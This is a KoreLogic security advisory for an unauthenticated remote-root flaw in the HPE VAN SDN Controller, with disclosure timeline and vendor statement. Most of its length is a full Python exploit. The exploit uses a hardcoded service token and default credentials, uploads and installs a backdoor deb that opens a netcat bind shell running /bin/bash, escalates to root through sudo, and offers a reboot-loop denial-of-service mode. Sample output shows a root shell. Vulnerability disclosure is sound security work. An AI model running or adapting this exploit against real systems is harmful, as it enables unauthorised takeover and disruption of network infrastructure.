1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401 | '''
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
KL-001-2018-008 : HPE VAN SDN Unauthenticated Remote Root Vulnerability
Title: HPE VAN SDN Unauthenticated Remote Root Vulnerability
Advisory ID: KL-001-2018-008
Publication Date: 2018.06.25
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt
1. Vulnerability Details
Affected Vendor: HP Enterprise
Affected Product: VAN SDN Controller
Affected Version: 2.7.18.0503
Platform: Embedded Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials,
CWE-20: Improper Input Validation
Impact: Privilege Escalation
Attack vector: HTTP
2. Vulnerability Description
A hardcoded service token can be used to bypass
authentication. Built-in functionality can be exploited
to deploy and execute a malicious deb file containing a
backdoor. A weak sudoers configuration can then be abused to
escalate privileges to root. A second issue can be used to
deny use of the appliance by continually rebooting it.
3. Technical Description
The exploit will automatically attempt to bypass authentication
unless the --no-auth-bypass flag is provided. If that flag is
provided, the --username and --password flags must also be given.
The options for the --payload flag are: rce-root and
pulse-reboot. The default option is rce-root. The pulse-reboot
payload will reboot the target device until the attack is stopped.
$ python hpevansdn-multiple_exploits.py --help
HPE VAN SDN Controller 2.7.18.0503
Unauthenticated Remote Root and Denial-of-Service
Usage: hpevansdn-multiple_exploits.py [options]
Options:
-h, --help show this help message and exit
--target=REMOTE_IP Target IP address
--no-auth-bypass No authentication bypass
--username=USERNAME Username (Default: sdn)
--password=PASSWORD Password (Default: skyline)
--payload=PAYLOAD Payload: rce-root(default), pulse-reboot
Below is output for the rce-root payload:
$ python hpevansdn-multiple_exploits.py --target 1.3.3.7
HPE VAN SDN Controller 2.7.18.0503
Unauthenticated Remote Root and Denial-of-Service
[+] Authentication successfully bypassed.
[-] Starting remote root exploit.
[-] Building backdoor.
[-] Uploading backdoor.
[+] Upload successful.
[-] Installing backdoor.
[+] Starting backdoor on port 49370.
[+] Connected to backdoor.
* For interactive root shell please run /var/lib/sdn/uploads/root-V6mlQNqW
id
uid=108(sdnadmin) gid=1000(sdn) groups=1000(sdn)
/var/lib/sdn/uploads/root-V6mlQNqW
root@medium-hLinux:/opt/sdn/admin# uname -a
Linux medium-hLinux 4.4.0-2-amd64-hlinux #hlinux1 SMP Thu Jan 28 12:35:26 UTC 2016 x86_64 GNU/Linux
root@medium-hLinux:/opt/sdn/admin# exit
[-] Removing backdoor.
[+] Backdoor removed.
4. Mitigation and Remediation Recommendation
The vendor issued the following statement:
HPE had evaluated the impact of service token being
leaked and previously updated the security procedure in
VAN 2.8.8 Admin Guide page 129. The full guide is here -
http://h20628.www2.hp.com/km-ext/kmcsdirect/emr_na-a00003662en_us-1.pdf.
HPE expects all customers to update their service token,
admin token, default sdn user password, and edit iptables as
described in the guideline. If the guideline was followed,
the exploit would not be successful.
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2018.02.16 - KoreLogic submits vulnerability details to HPE.
2018.02.16 - HPE acknowledges receipt.
2018.04.02 - 30 business days have elapsed since the vulnerability
was reported to HPE.
2018.04.23 - 45 business days have elapsed since the vulnerability
was reported to HPE.
2018.05.04 - KoreLogic requests an update on the status of the
remediation.
2018.05.14 - 60 business days have elapsed since the vulnerability
was reported to HPE.
2018.06.05 - 75 business days have elapsed since the vulnerability
was reported to HPE.
2018.06.11 - KoreLogic requests an update on the status of the
remediation.
2018.06.12 - HPE responds with the statement documented in Section
4. Mitigation and Remediation Recommendation.
2018.06.25 - KoreLogic public disclosure.
7. Proof of Concept
'''
from optparse import OptionParser
from random import randrange,choice
from threading import Thread
from os import mkdir,makedirs,system,listdir,remove
from string import ascii_letters,digits
from subprocess import check_output
from requests import get,post
from requests.utils import dict_from_cookiejar
from requests.exceptions import ConnectionError
from time import sleep
from sys import exit
from json import dumps
#################################
# PULSE REBOOT TIMER IN SECONDS #
pulse_timer = 60 #
#################################
banner = """HPE VAN SDN Controller 2.7.18.0503
Unauthenticated Remote Root and Denial-of-Service
""".center(80)
class Backdoor:
def __init__(self):
######################################################################################
# ATTACK SHELL SCRIPT #
self.backdoor_port = randrange(50000,55000) #
self.backdoor_script = """#!/bin/sh\nnc -l -p PORT -e /bin/bash &""" # DONT CHANGE #
self.backdoor_dir = '%s-1.0.0' % ''.join( #
[choice(digits + ascii_letters) for i in xrange(8)] #
) #
self.backdoor_script = self.backdoor_script.replace('PORT',str(self.backdoor_port)) #
######################################################################################
self.cmd_name = ''.join([choice(digits + ascii_letters) for i in xrange(8)])
return None
def generate(self):
print '[-] Building backdoor.'
control_template = """Source: %s
Section: misc
Priority: extra
Maintainer: None
Homepage: http://127.0.0.1/
Version: 1.0.0
Package: %s
Architecture: all
Depends:
Description: %s
""" % (self.backdoor_dir,self.cmd_name,self.backdoor_dir)
try:
mkdir(self.backdoor_dir)
mkdir('%s/%s' % (self.backdoor_dir,'DEBIAN'))
fp = open('%s/%s/control' % (self.backdoor_dir,'DEBIAN'),'w')
fp.write(control_template)
fp.close()
makedirs('%s/var/lib/sdn/uploads/tmp' % (self.backdoor_dir))
fp = open('%s/var/lib/sdn/uploads/tmp/%s' % (self.backdoor_dir,self.cmd_name),'w')
fp.write(self.backdoor_script)
fp.close()
fp = open('%s/var/lib/sdn/uploads/root-%s' % (self.backdoor_dir,self.cmd_name),'w')
fp.write("""#!/bin/sh\nsudo -u sdn /usr/bin/sudo python -c 'import pty;pty.spawn("/bin/bash")'""")
fp.close()
system('chmod a+x %s/var/lib/sdn/uploads/tmp/%s' % (self.backdoor_dir,self.cmd_name))
system('chmod a+x %s/var/lib/sdn/uploads/root-%s' % (self.backdoor_dir,self.cmd_name))
if "dpkg-deb: building package" not in check_output(
['/usr/bin/dpkg-deb', '--build', '%s/' % (self.backdoor_dir)]
):
print '[!] Could not build attack deb file. Reason: DPKG failure.'
except Exception as e:
print '[!] Could not build attack deb file. Reason: %s.' % (e)
return '%s.deb' % self.backdoor_dir,self.cmd_name,self.backdoor_port
class HTTP:
def __init__(self):
return None
def is_service_token_enabled(self):
url = 'https://%s:8443/sdn/ui/app/rs/hpws/config' % (self.target)
try:
r = get(url, headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent}, verify=False, allow_redirects=False)
if r.status_code == 200:
return True
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
return False
def get_session_token(self):
url = 'https://%s:8443/sdn/ui/app/login' % (self.target)
try:
r = post(url, headers={"User-Agent":self.user_agent},verify=False, data="username=%s&password=%s" % (self.username,self.password), allow_redirects=False)
if r.status_code == 303:
self.session_token = dict_from_cookiejar(r.cookies)['X-Auth-Token']
return True
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
return False
def upload_deb(self):
print '[-] Uploading backdoor.'
url = 'https://%s:8081/upload' % (self.target)
try:
fp = open('%s' % (self.deb_name),'rb')
data = fp.read()
fp.close()
try:
r = post(url,headers={"X-Auth-Token":self.session_token,"Filename":self.deb_name,"User-Agent":self.user_agent},verify=False,data=data)
if r.status_code == 200:
print '[+] Upload successful.'
return True
else:
print '[!] Upload failed. Please try again.'
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
except Exception as e:
print '[!] Failed to write backdoor to disk. Reason: %s.' % (e)
return False
def install_deb(self):
print '[-] Installing backdoor.'
url = 'https://%s:8081/' % (self.target)
post_body = dumps({"action":"install","name":self.deb_name})
try:
r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body)
if r.status_code == 200:
return True
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
return False
def start_shell(self):
print '[+] Starting backdoor on port %d.' % (self.backdoor_port)
url = 'https://%s:8081/' % (self.target)
post_body = dumps({"action":"exec","name":self.cmd_name})
try:
r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body)
if r.status_code == 200:
return True
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
return False
def uninstall_deb(self):
print '[-] Removing backdoor.'
url = 'https://%s:8081/' % (self.target)
post_body = dumps({"action":"uninstall","name":self.deb_name})
try:
r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body)
if r.status_code == 200:
return True
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
return False
def send_reboot(self):
print '[+] Sending reboot.'
url = 'https://%s:8081/' % (self.target)
post_body = dumps({"action":"reboot"})
try:
r = post(url,headers={"X-Auth-Token":self.session_token,"User-Agent":self.user_agent},verify=False,data=post_body)
except ConnectionError:
print '[!] Connection to target service failed.'
exit(1)
return False
class Exploit(HTTP):
def __init__(self,target=None,noauthbypass=None,
username=None,password=None,payload=None):
self.target = target
self.noauthbypass = noauthbypass
self.username = username
self.password = password
self.payload = payload
self.deb_name = ''
self.cmd_name = ''
self.backdoor_port = 0
self.session_token = 'AuroraSdnToken37'
self.user_agent = choice(['Mozilla/5.0 (X11; U; Linux x86_64; en-ca) AppleWebKit/531.2+ (KHTML, like Gecko) Version/5.0 Safari/531.2+',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; SV1; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Ubuntu/10.10 Chromium/8.0.552.237 Chrome/8.0.552.237 Safari/534.10'])
return None
def drop_root(self):
sleep(3)
print '[+] Connected to backdoor.\n\t* For interactive root shell please run /var/lib/sdn/uploads/root-%s' % (self.cmd_name)
system('nc %s %s' % (self.target,self.backdoor_port))
return False
def run(self):
if not self.is_service_token_enabled() or self.noauthbypass == True:
print '[-] Authentication bypass failed or running with --no-auth-bypass. Attempting login.'
if not self.get_session_token():
print '[!] Login failed. Exploit failed.'
exit(1)
else:
print '[+] Authentication successfully bypassed.'
if self.payload == 'rce-root':
print '[-] Starting remote root exploit.'
self.deb_name, self.cmd_name, self.backdoor_port = Backdoor().generate()
if self.upload_deb():
if self.install_deb():
Thread(target=self.start_shell,args=(),name="shell-%s" % (self.cmd_name)).start()
try:
self.drop_root()
except KeyboardInterrupt:
print '[-] Disconnecting from backdoor.'
return True
if self.uninstall_deb():
print '[+] Backdoor removed.'
else:
print '[!] Could not remove backdoor.'
return True
else:
print '[!] Failed to install backdoor.'
exit(1)
else:
print '[!] Failed to upload backdoor.'
exit(1)
print "[-] Please remember to srm %s and the build directory %s/" % (self.deb_name,self.deb_name.replace('.deb',''))
else:
print '[-] Starting pulse reboot exploit.'
while True:
try:
self.send_reboot()
sleep(pulse_timer)
except KeyboardInterrupt:
print '[-] Reboot pulse Denial-of-Service stopped.'
break
return False
if __name__=="__main__":
print banner
parser = OptionParser()
parser.add_option("--target",dest="remote_ip",default='',help="Target IP address")
parser.add_option("--no-auth-bypass",action="store_true",default=False,help="No authentication bypass")
parser.add_option("--username",dest="username",default="sdn",help="Username (Default: sdn)")
parser.add_option("--password",dest="password",default="skyline",help="Password (Default: skyline)")
parser.add_option("--payload",dest="payload",default='rce-root',help="Payload: rce-root(default), pulse-reboot")
o, a = parser.parse_args()
if o.remote_ip != '':
Exploit(target=o.remote_ip,
noauthbypass=o.no_auth_bypass,
username=o.username,
password=o.password,
payload=o.payload).run()
else:
print '[!] --target must be supplied.'
'''
The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
-----BEGIN PGP SIGNATURE-----
iQJOBAEBCAA4FiEETtzSIGy8wE6Vn0geUk0uR1lFz/MFAlsxL1caHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQUk0uR1lFz/OLgA/+I4R5zIz93rYS6VZBbMcD
6fQYup7o9yGkjSOyhTYMWJYL1BXMJHz534OUX54/vkvhoxdkhb4ouGIYneB+lXCb
WcPHGAkk094K50z9e3OXcsw3hDNS2lfQVS9IaHxR7iae4zRk6DQQYCBYgfPhi3+5
x9SkBV516WPM3iyu4Bgx19FTBcx3yXLRruGAftrceIiVdlUDrQbuu3Sht0oa3VBh
36mGDld7NS+vFHFJwTxbkBwodKViwDTzsYtnh0JId5ICp2a3PAR75Rwnbr+zt8SW
byD5CgA9szpSf7Sa6H8NnhGSKC47zXQ0K4uZsEJtkHqySjq0jvw1RngnIdJWnTFz
E6cEL7evsySeMKOoO1q8A0DpUigVFan3dxdaAE7uT9z2pN1RmRJglR8RiQo/L6ML
rKFhePlfsuqJon+Ux/R5XhKgT3oQbGwz/yaV1jSUujO+qqs0yI/pEIzhkj35Ovai
k9SiNQgIm8BvrIyA2nUI1xn32Pk2PFqh77gti5HVS3JExHsMPm5c3ZjKhw3/dS3d
wXeoeL7Vh+z2I0q9E2GzLSUqxh/vsYdlbcPprgH7GGsVElEhBprsw0AmNk7lh4e4
OwKI54tp0wbRewszQp8p9bbehwD+b4uFhqpD54w48yq3Ntv3/B07OprKWjEQUQC2
GKUgtPVRc8ZwJV+2c+MYICU=
=mzf4
-----END PGP SIGNATURE-----
'''
|
